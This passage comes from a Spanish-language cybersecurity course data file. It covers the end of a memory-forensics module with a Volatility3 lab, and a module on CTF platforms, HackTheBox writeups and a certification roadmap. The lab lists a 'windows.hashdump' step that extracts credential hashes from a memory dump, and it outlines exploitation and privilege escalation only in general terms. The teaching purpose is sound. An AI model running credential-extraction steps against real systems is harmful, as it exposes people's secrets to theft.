        instalacion: "Servicio web: app.any.run (versión gratuita disponible)",
        comando: "# Sube el archivo sospechoso y observa: conexiones de red, ficheros creados, registry changes",
      },
    ],
    labs: [
      {
        titulo: "Análisis de memoria RAM con Volatility3",
        descripcion: "Analiza un dump de RAM para encontrar procesos maliciosos, inyecciones y credenciales",
        pasos: [
          "Descarga un sample de memoria: busca en GitHub 'volatility memory samples' o usa Memdump de una VM propia",
          "Identifica el perfil del OS: python3 vol.py -f memory.dmp windows.info",
          "Lista procesos activos: python3 vol.py -f memory.dmp windows.pslist | tee procesos.txt",
          "Busca procesos sospechosos: python3 vol.py -f memory.dmp windows.pstree",
          "Detecta inyecciones: python3 vol.py -f memory.dmp windows.malfind | head -50",
          "Extrae procesos sospechosos: python3 vol.py -f memory.dmp windows.dumpfiles --pid SUSPICIOUS_PID",
          "Conexiones de red activas: python3 vol.py -f memory.dmp windows.netscan",
          "Busca credenciales: python3 vol.py -f memory.dmp windows.hashdump",
          "Analiza el binario extraído con strings y Ghidra",
        ],
        herramientas: ["volatility3", "strings", "Ghidra"],
        tips: [
          "windows.malfind busca regiones de memoria con permisos de escritura+ejecución — señal de code injection",
          "Correlaciona PIDs entre pslist, netscan y malfind para el análisis completo",
        ],
      },
    ],
    conceptosClave: [
      { termino: "IoC", definicion: "Indicator of Compromise — artefacto que indica una intrusión: hash de archivo malicioso, IP de C2, clave de registro, etc." },
      { termino: "C2 (C&C)", definicion: "Command & Control — servidor que el malware usa para recibir instrucciones y exfiltrar datos" },
      { termino: "Cadena de custodia", definicion: "Registro documentado y verificable de quién ha manipulado la evidencia digital y cuándo — esencial para proceso legal" },
      { termino: "Code Injection", definicion: "Técnica de malware que inyecta código malicioso en procesos legítimos (svchost.exe) para ocultarse" },
      { termino: "DFIR", definicion: "Digital Forensics and Incident Response — disciplina combinada de investigación forense y respuesta a incidentes" },
    ],
    recursos: [
      { titulo: "Volatility Documentation", url: "https://volatility3.readthedocs.io/", tipo: "documento", gratuito: true },
      { titulo: "CyberDefenders — Blue Team Labs", url: "https://cyberdefenders.org/", tipo: "plataforma", gratuito: true },
      { titulo: "The Art of Memory Forensics (libro)", url: "https://www.memoryanalysis.net/", tipo: "libro", gratuito: false },
      { titulo: "DFIR.training — recursos y desafíos", url: "https://www.dfir.training/", tipo: "plataforma", gratuito: true },
    ],
    consejos: [
      "El Blue Team side (forense, IR) te hace un mejor pentester — entiendes qué detecta el defensor",
      "Practica con los labs de CyberDefenders — son escenarios forenses reales pero en entorno seguro",
      "Any.run en versión gratuita es suficiente para la mayoría de análisis de malware básico",
    ],
  },

  {
    id: "ctf-certificaciones",
    numero: 12,
    titulo: "CTF, Plataformas y Certificaciones",
    subtitulo: "Roadmap profesional, labs, comunidad y carrera en ciberseguridad",
    descripcion:
      "Este módulo te da el mapa completo para convertirte en un profesional reconocido. Aprenderás a competir en CTFs, utilizar las mejores plataformas de práctica, obtener las certificaciones más valoradas por el mercado laboral, y construir tu carrera en ciberseguridad.",
    duracion: "Continuo",
    nivel: "Experto",
    icono: "🏆",
    color: "sun",
    temas: [
      "CTF (Capture The Flag): tipos — Jeopardy, Attack/Defense, King of the Hill",
      "Categorías CTF: Web, Pwn, Reverse, Crypto, Forensics, Misc, Steganography",
      "HackTheBox: máquinas activas, Pro Labs (Offshore, RastaLabs, Cybernetics)",
      "TryHackMe: rutas de aprendizaje guiadas para todos los niveles",
      "VulnHub: máquinas locales descargables y gratuitas",
      "PentesterLab: ejercicios web con código fuente para review",
      "PicoCTF: ideal para principiantes, organizado por Carnegie Mellon",
      "CTFtime.org: calendario global de competencias CTF",
      "Certificaciones por nivel: CompTIA A+ → Security+ → eJPT → CEH → OSCP → CRTO → CRTE",
      "Bug Bounty: HackerOne, Bugcrowd, Intigriti — cómo reportar y monetizar",
      "Construir un portfolio de hacking: writeups, GitHub, blog técnico",
      "Red Team vs Blue Team vs Purple Team: roles y diferencias",
      "Especialidades: Cloud Security, IoT, Mobile, AI/ML Security, ICS/SCADA",
      "Recursos de actualización: blogs, podcasts, newsletters, conferencias",
    ],
    herramientas: [
      {
        nombre: "HackTheBox",
        descripcion: "La plataforma más prestigiosa de hacking ético. Máquinas reales, Pro Labs de Active Directory y rankings globales",
        instalacion: "Registrarse en hackthebox.com — requiere resolver un pequeño reto para unirse",
        comando: "# Conecta via VPN: sudo openvpn tu_archivo.ovpn",
      },
      {
        nombre: "TryHackMe",
        descripcion: "La mejor plataforma para aprender con guía — tiene rutas completas de aprendizaje y máquinas en el navegador sin VPN",
        instalacion: "tryhackme.com — crea cuenta gratuita",
        comando: "# Empieza con: Pre-Security Path → Jr Penetration Tester Path",
      },
      {
        nombre: "Obsidian / CherryTree",
        descripcion: "Herramientas de notas para documentar hallazgos, técnicas y metodologías durante CTFs y pentests",
        instalacion: "sudo apt install cherrytree || snap install obsidian",
        comando: "# Estructura: /Técnicas /Maquinas /Writeups /Certificaciones",
      },
    ],
    labs: [
      {
        titulo: "Tu primer writeup de HackTheBox",
        descripcion: "Completa una máquina Easy de HTB y documenta el proceso completo como writeup profesional",
        pasos: [
          "Conecta a la VPN de HTB: sudo openvpn HTB_VPN.ovpn",
          "Selecciona una máquina Easy retirada (con writeups disponibles para comparar)",
          "Fase 1 - Reconocimiento: nmap completo, web enumeration",
          "Fase 2 - Explotación: identifica la vulnerabilidad y explota",
          "Fase 3 - Post-explotación: escalada de privilegios a root/Administrator",
          "Obtén las flags: cat /root/root.txt && cat /home/user/user.txt",
          "Escribe el writeup: contexto → reconocimiento → explotación → privesc → lecciones",
          "Añade capturas de pantalla de cada paso importante",
          "Publica en tu blog o GitHub (solo para máquinas retiradas)",
          "Comparte en r/netsec, Twitter/X con #HTB para obtener feedback",
        ],
        herramientas: ["nmap", "gobuster", "metasploit", "linpeas", "Obsidian"],
        tips: [
          "Los writeups de máquinas retiradas son legales y muy valorados por empleadores",
          "Un perfil activo en HTB con ranking alto vale más que muchas certificaciones en una entrevista",
          "Empieza con máquinas Easy de Linux antes de Windows o Medium",
        ],
      },
    ],
    conceptosClave: [
      { termino: "Writeup", definicion: "Documentación detallada de cómo se resolvió un CTF o máquina — esencial para el aprendizaje y el portfolio" },
      { termino: "Privilege Escalation", definicion: "Técnica para pasar de usuario limitado a root/admin — el objetivo final de la mayoría de máquinas" },
      { termino: "OSCP", definicion: "Offensive Security Certified Professional — la certificación de pentesting más reconocida en la industria, requiere examen de 24h sin parar" },
      { termino: "Bug Bounty", definicion: "Programa donde empresas pagan a investigadores por encontrar y reportar vulnerabilidades — desde $100 hasta $1M+" },
      { termino: "Red Team", definicion: "Equipo que simula adversarios reales en ataques prolongados y sigilosos contra organizaciones — el nivel más avanzado" },
    ],
    recursos: [
      { titulo: "HackTheBox", url: "https://www.hackthebox.com/", tipo: "plataforma", gratuito: false },
      { titulo: "TryHackMe", url: "https://tryhackme.com/", tipo: "plataforma", gratuito: true },
      { titulo: "CTFtime — calendario CTF mundial", url: "https://ctftime.org/", tipo: "plataforma", gratuito: true },
      { titulo: "HackerOne — Bug Bounty", url: "https://www.hackerone.com/", tipo: "plataforma", gratuito: true },
      { titulo: "r/netsec y r/hacking (Reddit)", url: "https://www.reddit.com/r/netsec/", tipo: "blog", gratuito: true },
      { titulo: "Darknet Diaries (Podcast)", url: "https://darknetdiaries.com/", tipo: "blog", gratuito: true },
      { titulo: "PortSwigger Web Security Academy", url: "https://portswigger.net/web-security", tipo: "plataforma", gratuito: true },
      { titulo: "PicoCTF", url: "https://picoctf.org/", tipo: "plataforma", gratuito: true },
    ],
    consejos: [
      "Orden recomendado de certificaciones: CompTIA Security+ → eJPT (eLearnSecurity) → PNPT (TCM) → OSCP",
      "OSCP es el objetivo — cambia tu carrera completamente. Prepárate 3-6 meses intensivos antes",
      "Lee writeups de otros aunque hayas resuelto la máquina — siempre habrá una técnica que no conocías",
      "La comunidad importa: únete a Discord de HTB, TryHackMe, TCM Security — aprenderás más que en libros",
      "Los mejores hackers éticos del mundo publican sus investigaciones — síguelos en Twitter/X y sus blogs",
    ],
  },
];

export const ROADMAP_CERTIFICACIONES = [
  {
    nivel: 1,
    nombre: "CompTIA Security+",
    descripcion: "La certificación de entrada al sector — reconocida globalmente, requerida por muchas empresas",
    dificultad: "Principiante",
    costo: "~$392 USD",
    preparacion: "2-3 meses",
  },
  {
    nivel: 2,
    nombre: "eJPT (eLearnSecurity Junior Penetration Tester)",
    descripcion: "Primera certificación práctica de pentesting — examen de 3 días en laboratorio real",
    dificultad: "Principiante",
    costo: "~$200 USD",
    preparacion: "1-2 meses",
  },
  {
    nivel: 3,
    nombre: "PNPT (Practical Network Penetration Tester)",
    descripcion: "TCM Security — examen de pentesting completo con Active Directory. Muy valorado y accesible",
    dificultad: "Intermedio",
    costo: "~$400 USD",
    preparacion: "3-4 meses",
  },
  {
    nivel: 4,
    nombre: "CEH (Certified Ethical Hacker)",
    descripcion: "EC-Council — reconocida en enterprise y gobierno. Más teórica que práctica",
    dificultad: "Intermedio",
    costo: "~$1,199 USD",
    preparacion: "2-3 meses",
  },
  {
    nivel: 5,
    nombre: "OSCP (Offensive Security Certified Professional)",
    descripcion: "LA certificación de pentesting. 24 horas de examen hacking máquinas reales. Cambia carreras",
    dificultad: "Avanzado",
    costo: "~$1,499 USD",
    preparacion: "6-12 meses",
  },
  {
    nivel: 6,
    nombre: "CRTO (Certified Red Team Operator)",
    descripcion: "Zero-Point Security — Red Teaming con Cobalt Strike. Muy práctico y bien considerado",
    dificultad: "Avanzado",
    costo: "~$436 USD",
    preparacion: "3-6 meses",
  },
  {
    nivel: 7,
    nombre: "CRTE (Certified Red Team Expert)",
    descripcion: "Altered Security — Active Directory avanzado, ataques a Azure AD y entornos enterprise",
    dificultad: "Experto",
    costo: "~$249 USD",
    preparacion: "4-6 meses",
  },
  {
    nivel: 8,
    nombre: "OSED/OSEP/OSWE (Offensive Security Advanced)",
    descripcion: "Los niveles más avanzados de Offensive Security: exploit dev, evasión, web expert",
    dificultad: "Experto",
    costo: "~$1,499 USD c/u",
    preparacion: "6-12 meses c/u",
  },
];

export const PLATAFORMAS_PRACTICA = [
  {
    nombre: "TryHackMe",
    url: "https://tryhackme.com",
    descripcion: "Ideal para principiantes. Rutas guiadas, máquinas en navegador, gamificada",
    nivel: "Principiante → Intermedio",
    precio: "Gratis (premium ~$14/mes)",
    emoji: "🟢",
  },
  {
    nombre: "HackTheBox",
    url: "https://hackthebox.com",
    descripcion: "La más prestigiosa. Máquinas reales, Pro Labs de AD, comunidad élite global",
    nivel: "Intermedio → Experto",
    precio: "Gratis (VIP ~$14/mes)",
    emoji: "🔴",
  },
  {
    nombre: "VulnHub",
    url: "https://vulnhub.com",
    descripcion: "Máquinas descargables gratuitas para tu laboratorio local. Cientos de opciones",
    nivel: "Todos los niveles",
    precio: "Gratis",
    emoji: "🟡",
  },
  {
    nombre: "PortSwigger Web Security Academy",
    url: "https://portswigger.net/web-security",
    descripcion: "El mejor recurso gratuito de web hacking. Labs interactivos con teoría incluida",
    nivel: "Principiante → Avanzado",
    precio: "Gratis",
    emoji: "🟠",
  },
  {
    nombre: "PicoCTF",
    url: "https://picoctf.org",
    descripcion: "CTF permanente para estudiantes creado por Carnegie Mellon. Perfecto para empezar",
    nivel: "Principiante",
    precio: "Gratis",
    emoji: "🟣",
  },
  {
    nombre: "HackerOne (Bug Bounty)",
    url: "https://hackerone.com",
    descripcion: "Plataforma líder de bug bounty. Gana dinero real encontrando vulnerabilidades reales",
    nivel: "Intermedio → Experto",
    precio: "Gratis (ganas rewards)",
    emoji: "💰",
  },
];
